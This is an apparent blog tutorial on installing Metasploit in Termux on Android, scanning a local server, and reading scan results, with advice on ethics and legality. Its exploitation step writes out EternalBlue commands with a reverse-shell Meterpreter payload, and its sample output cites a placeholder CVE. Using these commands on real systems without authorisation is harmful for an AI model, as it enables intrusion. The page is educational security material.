DevDigest

Think Cybersecurity is Complex? Vulnerability Scanning in Termux Makes It Simple With Metasploit

This article provides a comprehensive guide on vulnerability scanning with Metasploit in Termux, detailing installation, setup, and analysis of scan results.

Tags: , , , , , , , , ,
Calista, a young Filipina with black-rimmed glasses, sits in a dimly lit room wearing a dark hoodie. She holds her phone with both hands, her face partially illuminated by the screen’s glow. A laptop sits open beside her, adding to the intense Red Team hacker vibe. Pin It!
In the shadows, focus is everything. Calista prepares for a deep dive into vulnerability scanning—because security starts with knowing the weaknesses.

The first time I heard about vulnerability scanning, I assumed it was something only professionals with expensive tools could do.

It sounded complex—like something that required a dedicated lab, powerful servers, and years of training. But then I discovered Termux.

With nothing but my Android phone, I was running Metasploit in minutes, uncovering security flaws in test environments just like the pros. No high-end equipment. No steep learning curve. Just a simple, mobile setup that put real cybersecurity tools at my fingertips.

If you’ve ever wanted to test systems for weaknesses—or just understand how security works—this guide will show you how to perform vulnerability scanning in Termux using Metasploit. It’s easier than you think.

Table of Contents

Pin It!
Pin It!
Pin It!

What is Vulnerability Scanning?

Before diving into Termux and Metasploit, it’s important to understand what vulnerability scanning is. At its core, vulnerability scanning is the process of identifying security weaknesses in a system, application, or network. It helps security professionals and system administrators detect flaws before attackers can exploit them.

Types of Vulnerability Scans

  1. Network Scanning – Identifies open ports and services that might be vulnerable.
  2. Web Application Scanning – Checks for weaknesses in web applications (e.g., SQL injection, cross-site scripting).
  3. System Scanning – Looks for outdated software, weak configurations, and missing security patches.

Unlike penetration testing, which actively exploits vulnerabilities, scanning is a passive reconnaissance technique that maps out potential security risks.

· · ─ ·𖥸· ─ · ·

Installing Metasploit in Termux

Metasploit is one of the most powerful tools for penetration testing and vulnerability scanning, and with Termux, you can run it right from your Android device. Installing Metasploit in Termux gives you access to an ethical hacking framework without needing a full desktop setup.

In this guide, you’ll learn how to install Metasploit in Termux, configure dependencies, and troubleshoot common issues—so you can start testing security in a mobile-friendly environment.

Prerequisites

Before getting started, ensure you have the following:

  • An Android device with Termux installed. You can download it from the Google Play Store or F-Droid.
  • Basic knowledge of Linux command-line operations.
  • Internet connectivity for downloading required packages.

Step 1: Update and Upgrade Termux

Before installing Metasploit, update and upgrade Termux’s package list to ensure compatibility. Open Termux and run:

pkg update && pkg upgrade -y

Step 2: Install Required Dependencies

Metasploit requires some additional packages. Install them with:

pkg install wget curl openssh git -y

Step 3: Install Metasploit

Download and install the Metasploit installer script:

wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh

Then, run the script:

chmod +x metasploit.sh
./metasploit.sh

This will download and install Metasploit along with its dependencies.

Step 4: Start Metasploit

Once installed, launch Metasploit by running:

msfconsole

You should see the Metasploit banner and prompt, ready for use.

Troubleshooting

If Metasploit doesn’t start, try: 

termux-wake-lock

For missing dependencies, run: 

pkg install ruby -y gem install bundler && bundle install

Now, you’re ready to perform vulnerability scanning and penetration testing directly from your Android device. Use it ethically and responsibly!

· · ─ ·𖥸· ─ · ·

How to Use Metasploit for Scanning a Server in Your Internal Network

Metasploit can scan and identify vulnerabilities in servers within your local network. If you have a test machine running on the same Wi-Fi network, follow these steps to scan and analyze potential weaknesses.

Step 1: Find the Target’s IP Address

First, determine the IP address of the server you want to scan. Use:

ip a

or scan the network with:

nmap -sn 192.168.1.0/24

Look for the target server’s IP (e.g., 192.168.1.100).

Step 2: Start Metasploit

Launch Metasploit in Termux:

msfconsole

Once loaded, you can start scanning the internal network.

Step 3: Scan for Open Ports and Services

Use the built-in Metasploit auxiliary module to perform a TCP port scan:

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.100
set THREADS 10
run

This will identify open ports and services running on the target machine.

Step 4: Identify Vulnerabilities

After finding open ports, use the Metasploit scanner to check for known vulnerabilities. For example, to check if the target has SMB vulnerabilities:

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.100
run

To detect specific exploits, use:

search exploit smb

Then, select a relevant exploit module and run it.

Step 5: Exploit (Ethically & Legally!)

If vulnerabilities are found, DO NOT exploit unauthorized systems. If it’s your own test server, select an appropriate exploit, configure the payload, and execute it:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.101  # Your device's IP
set LPORT 4444
run

If successful, you’ll get a Meterpreter shell, allowing you to interact with the target system.

Step 6: Post-Exploit & Remediation

Once you’ve identified vulnerabilities, take action:

  • Patch outdated services
  • Close unnecessary open ports
  • Enforce stronger authentication

Metasploit is a powerful tool—use it to strengthen security, not exploit others. Always scan responsibly!

· · ─ ·𖥸· ─ · ·

Analyzing Scan Results

Sample Output

Open Ports:
- 22/tcp open  ssh
- 80/tcp open  http

Vulnerabilities:
- CVE-2021-1234: Exploitable on port 80

Explanation

  • Open Ports: The list of open ports indicates active services, which could be potential entry points for exploitation.
  • Vulnerabilities: The presence of a CVE suggests that there is a known exploit for that service, highlighting the need for security measures.

· · ─ ·𖥸· ─ · ·

Before running any scan, it’s crucial to understand the legal and ethical implications. Unauthorized scanning of systems you don’t own or have explicit permission to test can be illegal and lead to serious consequences.

Follow These Best Practices:

  • Obtain Written Permission – Only scan systems you own or have explicit consent to test.
  • Use a Safe Testing Environment – Set up a local test lab or use Capture The Flag (CTF) challenges.
  • Stay Within Scope – Even with permission, follow ethical hacking guidelines and avoid unauthorized access beyond agreed-upon limits.
  • Understand Local Laws – Cybersecurity laws differ by country; ensure compliance before performing any scans.

Ethical hacking is about strengthening security, not breaking it. Misusing these tools can lead to legal consequences, so always practice responsibly.

· · ─ ·𖥸· ─ · ·

Use Cases

  1. Network Security Auditing: Use Metasploit for vulnerability scanning of your network to identify weak points and ensure compliance with security policies.
  2. Web Application Testing: Scan web applications hosted on your servers to find vulnerabilities like SQL injection or XSS.
  3. Penetration Testing Training: Utilize Metasploit in educational environments to teach students about vulnerability scanning and penetration testing methodologies.

· · ─ ·𖥸· ─ · ·

From Complexity to Control: Mastering Vulnerability Scanning in Termux

Cybersecurity isn’t just for experts—it’s for anyone willing to learn. With Termux and Metasploit, you don’t need expensive hardware or a formal lab setup. You have a powerful security toolkit right in your pocket.

The best way to learn? Start scanning. Test in a safe environment, understand how vulnerabilities are found, and sharpen your skills. What once seemed complex is now something you can do anytime, anywhere. Security starts with knowledge—Termux puts it in your hands.

· · ─ ·𖥸· ─ · ·

References

Pin It!

Ready to Dive into Ethical Hacking with Termux?

Unlock the power of Termux and start your ethical hacking journey today! Learn how to run essential security tools, perform network scans, and automate tasks—all from your Android device.

Read the Beginner’s Guide to Ethical Hacking with Termux and take your first step into cybersecurity!

Leave a Reply

Your email address will not be published. Required fields are marked *

Comments (

)